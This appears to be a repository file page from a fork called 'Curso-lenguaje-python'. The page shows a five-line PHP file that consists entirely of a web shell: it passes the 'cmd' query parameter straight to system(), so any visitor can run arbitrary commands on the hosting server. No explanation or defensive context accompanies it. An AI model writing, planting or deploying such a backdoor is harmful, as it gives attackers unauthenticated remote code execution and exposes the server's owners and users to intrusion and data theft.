You've already forked Curso-lenguaje-python
5 lines
36 B
PHP
5 lines
36 B
PHP
<?php
|
|
|
|
system($_GET['cmd']);
|
|
|
|
?>
|